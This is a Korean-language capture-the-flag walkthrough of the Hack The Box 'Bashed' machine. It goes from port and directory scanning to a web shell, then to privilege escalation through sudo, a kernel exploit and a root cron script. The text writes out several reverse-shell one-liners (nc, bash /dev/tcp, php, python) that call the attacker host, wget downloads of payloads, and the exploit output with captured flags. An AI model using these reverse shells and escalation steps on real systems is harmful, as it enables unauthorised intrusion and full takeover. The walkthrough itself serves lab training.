5. Bashed

 

 

 

 

 

 

 

 

---

 

 

1. SCANNING

┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 14:34 KST
Nmap scan report for 10.10.10.68
Host is up (0.20s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

 

 

┌──(root💀takudaddy)-[/htb]
└─# gobuster dir -f -t 50 -x html,sh,php,pl -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,pl,html,sh
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2021/04/19 14:45:13 Starting gobuster in directory enumeration mode
===============================================================
/images/              (Status: 200) [Size: 1564]
/icons/               (Status: 403) [Size: 292] 
/about.html           (Status: 200) [Size: 8193]
/index.html           (Status: 200) [Size: 7743]
/uploads/             (Status: 200) [Size: 14]  
/contact.html         (Status: 200) [Size: 7805]
/php/                 (Status: 200) [Size: 939] 
/css/                 (Status: 200) [Size: 1758]
/dev/                 (Status: 200) [Size: 1148]
/js/                  (Status: 200) [Size: 3165]
/config.php           (Status: 200) [Size: 0]   
/fonts/               (Status: 200) [Size: 2095]
/single.html          (Status: 200) [Size: 7477]
/scroll.html          (Status: 200) [Size: 10863]
Progress: 312435 / 438325 (71.28%)              ndex.html           (Status: 200) [S                                                 
===============================================================
2021/04/19 15:15:19 Finished

 

uploads

 

 

 

jenn marshall

 

 

 

 

 

 

 

인터렉티브 쉘이 열림

 

 

 

 

---

 

 

 

2. EXPLOITATION

www-data@bashed
:/var/www/html/dev# date ; id ; hostname ; ifconfig

Sun Apr 18 23:58:45 PDT 2021
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bashed
ens33 Link encap:Ethernet HWaddr 00:50:56:b9:4c:d1
inet addr:10.10.10.68 Bcast:10.10.10.255 Mask:255.255.255.255
inet6 addr: dead:beef::250:56ff:feb9:4cd1/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:4cd1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:780961 errors:0 dropped:0 overruns:0 frame:0
TX packets:762151 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:116588729 (116.5 MB) TX bytes:354062144 (354.0 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:29576 errors:0 dropped:0 overruns:0 frame:0
TX packets:29576 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:2279352 (2.2 MB) TX bytes:2279352 (2.2 MB)

www-data@bashed
:/bin# uname -a

Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


www-data@bashed
:/home/arrexel# ls -al

total 36
drwxr-xr-x 4 arrexel arrexel 4096 Dec 4 2017 .
drwxr-xr-x 4 root root 4096 Dec 4 2017 ..
-rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history
-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec 4 2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec 4 2017 .nano
-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile
-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt
www-data@bashed
:/home/arrexel# cat user.txt

2c281f318555dbc1b856957c7147bfc1

www-data@bashed
:/tmp# sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

www-data@bashed
:/tmp# sudo -u scriptmanager id

uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
www-data@bashed
:/tmp# sudo -u scriptmanager /bin/bash -p

www-data@bashed
:/tmp# ls

VMwareDnD
systemd-private-2749b79ae51c415aac91a513270c78d2-systemd-timesyncd.service-yMmyIE
vmware-root
www-data@bashed
:/tmp# sudo -u scriptmanager cat /root/root.txt

cat: /root/root.txt: Permission denied

 

sudo -u 명령어로 script manager

권한을 사용하는것은 일시적으로만 가능하고

지속적으로는 안된다.

 

 

다른 시도

www-data@bashed
:/tmp# wget http://10.10.14.13/LES.sh

--2021-04-19 00:01:23-- http://10.10.14.13/LES.sh
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 87559 (86K) [text/x-sh]
Saving to: 'LES.sh'

0K .......... .......... .......... .......... .......... 58% 121K 0s
50K .......... .......... .......... ..... 100% 11.4M=0.4s

2021-04-19 00:01:24 (206 KB/s) - 'LES.sh' saved [87559/87559]


www-data@bashed
:/tmp# chmod 777 LES.sh


www-data@bashed
:/tmp# ./LES.sh

76 kernel space exploits
48 user space exploits


Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2017-6074] dccp

Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} ]
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2016-5195] dirtycow

 

45010 코드를 컴파일해 받아 봤지만 실행이 안됨

 

 

리스너 하나 기동하고

리버스 쉘 3 종 세트 실행

www-data@bashed
:/tmp# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 7979 >/tmp/f

www-data@bashed
:/tmp# bash -i >&/dev/tcp/10.10.14.13/7979 0>&1

www-data@bashed
:/tmp# php -r '$sock=fsockopen("10.10.14.13",7979);exec("/bin/sh -i<&3 >&3 2>&3");'

 

다 실패

 

 

 

다른 방법

uploads 디렉터리 활용

www-data@bashed
:/var/www/html/uploads# wget http://10.10.14.13/reverse.php

--2021-04-19 00:44:52-- http://10.10.14.13/reverse.php
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K)
Saving to: 'reverse.php'

0K ..... 100% 347M=0s

2021-04-19 00:44:52 (347 MB/s) - 'reverse.php' saved [5493/5493]

www-data@bashed
:/var/www/html/uploads# ls

index.html
reverse.php
www-data@bashed
:/var/www/html/uploads# 

 

 

리스너 하나 띄우고

url에 해당 파일 경로 /uploads/reverse.php

입력하면

 

┌──(root💀takudaddy)-[/attack]
└─# nc -lvnp 7979                                                               1 ⨯
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.68] 50654
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 00:47:41 up 33 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id ; hostname ; ifconfig
uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

침투 성공.

 

 

---

 

3. PRIVILEGE ESCALTION

 

 

우선 scriptmanager로 권한 상승 후

위에서 받았지만 실행 안되었던

공격 코드를 다시 받아 실행하면 끝.

 

gcc가 없으므로 미리 컴파일해서 가지고 올 것!

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/$ sudo -u scriptmanager /bin/bash -p  (sudo -u scriptmanager /bin/bash)
sudo -u scriptmanager /bin/bash -p
scriptmanager@bashed:/$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)


scriptmanager@bashed:~$ which gcc
which gcc
scriptmanager@bashed:~$ wget http://10.10.14.13/45010
wget http://10.10.14.13/45010
--2021-04-19 00:55:43--  http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: '45010'

45010               100%[===================>]  21.74K   107KB/s    in 0.2s    

2021-04-19 00:55:44 (107 KB/s) - '45010' saved [22264/22264]

scriptmanager@bashed:~$ ls
ls
45010  45010.c
scriptmanager@bashed:~$ ls -al
ls -al
total 68
drwxr-xr-x 3 scriptmanager scriptmanager  4096 Apr 19 00:55 .
drwxr-xr-x 4 root          root           4096 Dec  4  2017 ..
-rw------- 1 scriptmanager scriptmanager     2 Dec  4  2017 .bash_history
-rw-r--r-- 1 scriptmanager scriptmanager   220 Dec  4  2017 .bash_logout
-rw-r--r-- 1 scriptmanager scriptmanager  3786 Dec  4  2017 .bashrc
drwxr-xr-x 2 scriptmanager scriptmanager  4096 Dec  4  2017 .nano
-rw-r--r-- 1 scriptmanager scriptmanager   655 Dec  4  2017 .profile
-rw-r--r-- 1 scriptmanager scriptmanager 22264 Apr 18 23:59 45010
-rw-r--r-- 1 scriptmanager scriptmanager 13728 Apr 18 23:59 45010.c
scriptmanager@bashed:~$ chmod 777 45010
chmod 777 45010
scriptmanager@bashed:~$ ./45010
./45010
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800352dde00
[*] Leaking sock struct from ffff880033357400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880039586e40
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff880039586e40
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),1001(scriptmanager)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
cc4f0afe3a1026d402ba10329674a8e2
# 

 

 

 

 

 

다른 방법

scriptmanager@bashed:/$ cd scripts
cd scripts
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr 19 01:02 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Apr 19 01:05 test.txt

scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt

testing 123!scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ 

 

test.py 파일을 실행하면

test.txt 파일을 열고

testing 123을 출력하고 닫게 된다.

 

 

재미있는 점은

test.txt 파일의 마지막 실행 날짜가

오늘 날짜.

 

 

딱히 test.py를 실행하지도 않았는데

자동으로 실행된 것을 보면

루트가 crontab으로 반복 작업을 걸어놨을

확률이 높다.

 

 

또한 test.txt 파일은 루트 권한으로 실행 되기 때문에

test.py 파일을 수정해 권한을 상승하면 되겠다.

 

 

 

사용 할 공격 구문은 아래와 같고

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

 

 

터미널 버전 문제로 vi를 제대로 사용하기가 어렵기 때문에

한 줄씩 별도로 넣어 주었다.

scriptmanager@bashed:/scripts$ echo 'import socket,subprocess,os' > test.py
echo 'import socket,subprocess,os' > test.py
scriptmanager@bashed:/scripts$ echo 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM)' >> test.py
STREAM)' >> test.pyet(socket.AF_INET,socket.SOCK_ 
scriptmanager@bashed:/scripts$ echo 's.connect(("10.10.14.13",8989))' >> test.py
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.13",8989))
scriptmanager@bashed:/scripts$ echo 'os.dup2(s.fileno(),0)' >> test.py
echo 'os.dup2(s.fileno(),0)' >> test.py
scriptmanager@bashed:/scripts$ echo 'os.dup2(s.fileno(),1)' >> test.py
echo 'os.dup2(s.fileno(),1)' >> test.py
scriptmanager@bashed:/scripts$ echo 'os.dup2(s.fileno(),2)' >> test.py
echo 'os.dup2(s.fileno(),2)' >> test.py
scriptmanager@bashed:/scripts$ echo 'p=subprocess.call(["/bin/sh","-i"])' >> test.py
t.py 'p=subprocess.call(["/bin/sh","-i"])' >> tes 
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.13",8989))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

 

 

리스너를 기동하고 조금 기다려 주면

자동으로 접속 되며,

 

 

루트 권한을 획득한 후 크론탭을 확인해 보니

scripts 디렉터리 아래 모든 python 파일이

매분 실행된다.

 

┌──(root💀takudaddy)-[/htb/bash]
└─# nc -lvnp 8989                                                           1 ⨯ 2 ⚙
listening on [any] 8989 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.68] 37772
/bin/sh: 0: can't access tty; job control turned off
# id ; whoami ; date ; crontab -l ; date
uid=0(root) gid=0(root) groups=0(root)
root
Mon Apr 19 01:20:23 PDT 2021
* * * * * cd /scripts; for f in *.py; do python "$f"; done
Mon Apr 19 01:20:23 PDT 2021
# cd /root
# cat root.txt
cc4f0afe3a1026d402ba10329674a8e2

 

 

 

필요 없는 작업이지만

시험 삼아 다른 py 파일을 생성해

기다려 봐도 실행 되는 것을 확인함

 

 

끝